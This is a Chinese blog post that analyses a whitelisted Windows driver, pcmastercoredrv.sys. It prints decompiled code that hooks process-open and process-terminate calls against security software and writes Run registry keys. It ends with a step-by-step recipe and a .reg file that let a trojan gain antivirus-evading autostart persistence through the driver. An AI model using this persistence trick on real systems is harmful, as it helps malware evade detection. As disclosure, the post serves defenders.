簞純资源管理器 
网站统计浅谈白利用四
所谓权力越大,责任越大,驱动中被利用,可能导致的危害也更大,这里举个例子,也希望大家在写驱动的时候,除了完成功能外,也要考虑到是否有被恶意利用的可能。
MD5 746994da30a10488d090d95f28611e6f
pcmastercoredrv.sys 魔方电脑大师核心驱动程序
1, 挂钩 ZwOpenProcess,ZwTerminateProcess,禁止360,金山,腾讯,打开其进程,可能导致加速球类无法优化关闭其进程。、
2, 等WINLOGON起来后,读取注册表内的指定路径,写入RUN项,开机启动,没有任何验证,导致可被木马利用,随意加载启动项。
目前360已将该驱动清出白名单,但不清除其他杀软是否还在白名单里。
NTSTATUS __stdcall start(PDRIVER_OBJECTDriverObject, int a2)
{
NTSTATUS result; // eax@2
PVOID v3; // eax@6
PVOID v4; // edx@6
signed int i; // [sp+0h] [bp-30h]@3
HANDLE Handle; // [sp+8h] [bp-28h]@8
UNICODE_STRING SymbolicLinkName; //[sp+Ch] [bp-24h]@6
NTSTATUS status; // [sp+18h][bp-18h]@1
PDEVICE_OBJECT DeviceObject; //[sp+1Ch] [bp-14h]@1
UNICODE_STRING DestinationString; //[sp+24h] [bp-Ch]@1
PVOID DeviceExtension; // [sp+2Ch][bp-4h]@6
RtlInitUnicodeString(&DestinationString, L"\\Device\\PCMasterCoreDrv");
status =IoCreateDevice(DriverObject, 0x24u, &DestinationString, 0x22u, 0, 0,&DeviceObject);
if ( status >= 0 )
{
for ( i = 0; i < 27;++i )
DriverObject->MajorFunction[i] = (PDRIVER_DISPATCH)Generaldispatch;
DriverObject->MajorFunction[0] = (PDRIVER_DISPATCH)DispatchCreate;
DriverObject->MajorFunction[2] = (PDRIVER_DISPATCH)DispatchClose;
DriverObject->MajorFunction[14]= (PDRIVER_DISPATCH)DispatchIoControl;
DriverObject->DriverUnload = (PDRIVER_UNLOAD)DrvUnload;
DeviceExtension =DeviceObject->DeviceExtension;
*(_DWORD*)DeviceExtension = DeviceObject;
v3 = DeviceExtension;
*((_DWORD*)DeviceExtension + 1) = *(_DWORD *)&DestinationString;
*((_DWORD *)v3 + 2) =DestinationString.Buffer;
*((_DWORD*)DeviceExtension + 5) = 0;
*((_BYTE*)DeviceExtension + 24) = 1;
*((_DWORD*)DeviceExtension + 7) = 1;
*((_DWORD*)DeviceExtension + 8) = 0;
LogInit("===pDeviceExtension->StartupLogFinished = true\r\n");
RtlInitUnicodeString(&SymbolicLinkName, L"\\DosDevices\\PCMasterCoreDrv");
v4 = DeviceExtension;
*((_DWORD*)DeviceExtension + 3) = *(_DWORD *)&SymbolicLinkName;
*((_DWORD *)v4 + 4) =SymbolicLinkName.Buffer;
status =IoCreateSymbolicLink(&SymbolicLinkName, &DestinationString);
if ( status >= 0 )
{
HookOpenTerminateProcess();
status =PsCreateSystemThread(&Handle, 0, 0, 0, 0, (PKSTART_ROUTINE)WartForWinLogonThread, DriverObject);
if ( status< 0 )
sub_115C0(L"===Reg CreateThread WartForWinLogon Failed!\n");
status =PsCreateSystemThread(&Handle, 0, 0, 0, 0,(PKSTART_ROUTINE)LogProcessCPUUsageThread, DriverObject);
ZwClose(Handle);
result =status;
}
else
{
IoDeleteDevice(DeviceObject);
result =status;
}
}
else
{
result = status;
}
return result;
}
char __cdecl HookOpenTerminateProcess()
{
char result; // al@2
signed int v1; // eax@7
ULONG MajorVersion; // [sp+0h][bp-18h]@3
char v3; // [sp+Bh] [bp-Dh]@1
__int16 v4; // [sp+Ch] [bp-Ch]@1
ULONG MinorVersion; // [sp+10h][bp-8h]@3
ULONG BuildNumber; // [sp+14h][bp-4h]@3
v3 = 1;
v4 = 0;
if ( CheckSsdtHook() )
{
result = 1;
}
else
{
PsGetVersion(&MajorVersion, &MinorVersion, &BuildNumber, 0);
if ( MajorVersion == 5&& MinorVersion == 1 || MajorVersion >= 6 && MinorVersion>= 1 )
{
v1 = MapKeServiceDescriptorTable();
v3 = v1>= 0;
if ( v1>= 0 )
{
OldZwOpenProcess = (int (__stdcall *)(_DWORD, _DWORD, _DWORD,_DWORD))_InterlockedExchange(
(signed __int32 *)BaseAddressKeServiceDescriptorTable
+ *(_DWORD *)((char *)&ZwOpenProcess + 1),
(signed __int32)MyZwOpenProcess);
OldZwTerminateProcess = (int (__stdcall *)(_DWORD,_DWORD))_InterlockedExchange(
(signed__int32 *)BaseAddressKeServiceDescriptorTable
+ *(_DWORD *)((char *)&ZwTerminateProcess + 1),
(signed __int32)MyZwTerminateProcess);
bHookFlag = 1;
}
}
result = v3;
}
return result;
}
unsigned int __stdcallMyZwOpenProcess(HANDLE *a1, int a2, int a3, int a4)
{
unsigned int result; // eax@14
__int64 v5; // [sp+0h] [bp-18h]@4
int v6; // [sp+8h] [bp-10h]@1
PEPROCESS v7; // [sp+Ch] [bp-Ch]@4
PVOID Object; // [sp+10h] [bp-8h]@1
char *v9; // [sp+14h] [bp-4h]@6
Object = 0;
v6 =OldZwOpenProcess(a1, a2, a3, a4);
if ( v6 >= 0
&& a1
&& ObReferenceObjectByHandle(*a1, 1u, 0, 0, &Object, 0) >= 0
&& (v5 = (unsigned int)PsGetProcessId(Object), v7 =IoGetCurrentProcess(), (PVOID)v7 != Object)
&& sub_138C0(v5) != -1
&& (v9 = (char *)PsGetProcessImageFileName(v7), stricmp(v9,"lsass.exe"))
&& stricmp(v9, "csrss.exe") )
{
if (!stricmp(v9, "kxetray.exe")
|| !stricmp(v9, "QQPCRealTimeSpeedup.exe")
|| !stricmp(v9, "QQPCTray.exe")
|| !stricmp(v9, "360Tray.exe") )
*a1 = 0;
result= 0xC0000022u;
}
else
{
result = v6;
}
return result;
}
int __stdcall MyZwTerminateProcess(HANDLEHandle, int a2)
{
int result; // eax@8
__int64 v3; // [sp+0h] [bp-18h]@2
PEPROCESS CurrentProcess; // [sp+Ch][bp-Ch]@2
PVOID Object; // [sp+10h] [bp-8h]@1
char *ImageFileName; // [sp+14h][bp-4h]@4
if ( ObReferenceObjectByHandle(Handle,1u, 0, 0, &Object, 0) < 0
|| (v3 =PsGetProcessId(Object), CurrentProcess = IoGetCurrentProcess(),(PVOID)CurrentProcess == Object)
|| sub_138C0(v3) == -1 )
{
result =OldZwTerminateProcess(Handle, a2);
}
else
{
ImageFileName= (char *)PsGetProcessImageFileName(CurrentProcess);
if (stricmp(ImageFileName, "kxetray.exe") &&stricmp(ImageFileName, "QQPCRealTimeSpeedup.exe") )
{
if ( stricmp(ImageFileName, "QQPCTray.exe") )
stricmp(ImageFileName, "360Tray.exe");
}
ObfDereferenceObject(Object);
result= 0xC0000022u;
}
return result;
}
void __stdcall WartForWinLogonThread(inta1)
{
char v1; // [sp+3h] [bp-19h]@1
UNICODE_STRING DestinationString; //[sp+4h] [bp-18h]@8
PVOID j; // [sp+Ch] [bp-10h]@6
NTSTATUS i; // [sp+10h] [bp-Ch]@2
SIZE_T SystemInformationLength; //[sp+14h] [bp-8h]@1
PVOID P; // [sp+18h] [bp-4h]@1
SystemInformationLength = 0x100000u;
P = 0;
v1 = 0;
WriteLog(L"===Reg Begin of WartForWinLogon\n");
while ( 1 )
{
P =ExAllocatePool(PagedPool, SystemInformationLength);
for ( i =ZwQuerySystemInformation(SystemProcessesAndThreadsInformation, P,SystemInformationLength, 0);
i == 0xC0000004;
i = ZwQuerySystemInformation(SystemProcessesAndThreadsInformation, P,SystemInformationLength, 0) )
{
SystemInformationLength += 0x100000u;
ExFreePoolWithTag(P, 0);
P =ExAllocatePool(PagedPool, SystemInformationLength);
}
if ( i < 0 )
break;
for ( j = P; ; j = (char*)j + *(_DWORD *)j )
{
if (*((_DWORD *)j + 17) )
{
RtlInitUnicodeString(&DestinationString, L"winlogon.exe");
if ( RtlEqualUnicodeString((PCUNICODE_STRING)j + 7, &DestinationString, 1u))
break;
}
if (!*(_DWORD *)j )
goto LABEL_12;
}
v1 = 1;
WritePcMasterRegRun();
LABEL_12:
ExFreePoolWithTag(P, 0);
if ( v1 )
break;
Sleep(100);
}
PsTerminateSystemThread(0);
WriteLog(L"===Reg End ofWartForWinLogon\n");
}
void __cdecl WritePcMasterRegRun()
{
signed int v0; // [sp+0h] [bp-18h]@1
signed int v1; // [sp+4h] [bp-14h]@1
int v2; // [sp+8h] [bp-10h]@1
PCWSTR SourceString; // [sp+Ch][bp-Ch]@1
int v4; // [sp+10h] [bp-8h]@1
PVOID P; // [sp+14h] [bp-4h]@1
v4 = 0;
v1 = 1;
v0 = 1;
P = 0;
v2 = 0;
SourceString = L"\\Registry\\Machine\\SOFTWARE\\RuanMei\\PCMaster";
WriteLog(L"===Reg Begin ofWriteRegRun\n");
if ( ReadRegValue(L"\\Registry\\Machine\\SOFTWARE\\RuanMei\\PCMaster",L"pcmas", 4, &P, (size_t *)&v2) )
{
v4 = *(_BYTE *)P;
ExFreePoolWithTag(P,0x70726567u);
}
if ( ReadRegValue(SourceString,L"st", 4, &P, (size_t *)&v2) )
{
v1 = *(_BYTE *)P;
ExFreePoolWithTag(P,0x70726567u);
}
if ( v1 == 1 )
{
WriteLog(L"===RegWriteRegRun_ReadRegValue_Startup_Tray\n");
WriteRegRun(L"pcmaster",(int)L"pcmastertray.exe", (int)L"/autostart");
}
else
{
if ( !v4 )
{
WriteLog(L"===Reg WriteRegRun_DelRegRun\n");
sub_14F20(L"pcmaster");
}
}
if ( ReadRegValue(SourceString,L"swg", 4, &P, (size_t *)&v2) )
{
v0 = *(_BYTE *)P;
ExFreePoolWithTag(P,0x70726567u);
}
if ( v0 == 1 )
{
WriteLog(L"===RegWriteRegRun_ReadRegValue_Startup_WG\n");
WriteRegRun(L"winguard",(int)L"winguard.exe", (int)L"/autostart");
}
}
int __stdcall WriteRegRun(PCWSTRSourceString, int a2, int a3)
{
UNICODE_STRING DestinationString; //[sp+0h] [bp-1040h]@2
NTSTATUS v5; // [sp+8h] [bp-1038h]@2
UNICODE_STRING ValueName; // [sp+Ch][bp-1034h]@5
int v7; // [sp+14h] [bp-102Ch]@1
OBJECT_ATTRIBUTES ObjectAttributes;// [sp+18h] [bp-1028h]@2
HANDLE Handle; // [sp+30h][bp-1010h]@1
PVOID P; // [sp+34h] [bp-100Ch]@1
int v11; // [sp+38h] [bp-1008h]@1
ULONG DataSize; // [sp+3Ch][bp-1004h]@1
wchar_t Data; // [sp+40h][bp-1000h]@1
char v14; // [sp+42h] [bp-FFEh]@1
Handle = 0;
P = 0;
v7 = 0;
v11 = (int)L"\\Registry\\Machine\\SOFTWARE\\RuanMei\\PCMaster";
Data = 0;
memset(&v14, 0, 0xFFEu);
DataSize = 0;
WriteLog(L"===Reg Begin ofWriteRegRun\n");
if (ReadRegValue(L"\\Registry\\Machine\\SOFTWARE\\RuanMei\\PCMaster",L"Install_Dir", 1, &P, (size_t *)&v7) )
{
sub_15310(&Data,2048, L"\"");
sub_15310(&Data,2048, P);
ExFreePoolWithTag(P,0x70726567u);
RtlInitUnicodeString(&DestinationString,L"\\Registry\\Machine\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run");
ObjectAttributes.Length= 24;
ObjectAttributes.RootDirectory = 0;
ObjectAttributes.Attributes= 64;
ObjectAttributes.ObjectName = &DestinationString;
ObjectAttributes.SecurityDescriptor = 0;
ObjectAttributes.SecurityQualityOfService = 0;
v5 =ZwOpenKey(&Handle, 0xF003Fu, &ObjectAttributes);
if ( v5 >= 0 )
{
sub_15310(&Data,2048, a2);
sub_15310(&Data, 2048, L"\"");
if ( a3 )
{
sub_15310(&Data, 2048, L" ");
sub_15310(&Data, 2048, a3);
}
DataSize = 2* wcslen(&Data) + 2;
RtlInitUnicodeString(&ValueName, SourceString);
v5 = ZwSetValueKey(Handle, &ValueName, 0, 1u,&Data, DataSize);
ZwClose(Handle);
}
}
WriteLog(L"===Reg End ofWriteRegRun\n");
return 0;
}
木马只需将自己的可执行文件,放在C盘根目录下,改名为pcmastertray.exe,或winguard.exe,并导入如下注册表,等自己程序起来后,删除注册表,则所有杀软查杀均无法查杀到,而该驱动在开机的时候,在WINLOGON起来之后,会自动将启动项写入注册表。由于写入是在驱动的SYSTEM 线程中,一般杀软不会拦截。
Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\RuanMei] [HKEY_LOCAL_MACHINE\SOFTWARE\RuanMei\PCMaster] "pcmas"=dword:00000001 "st"=dword:00000001 "Install_Dir"="c:\\"
共有 0 条看法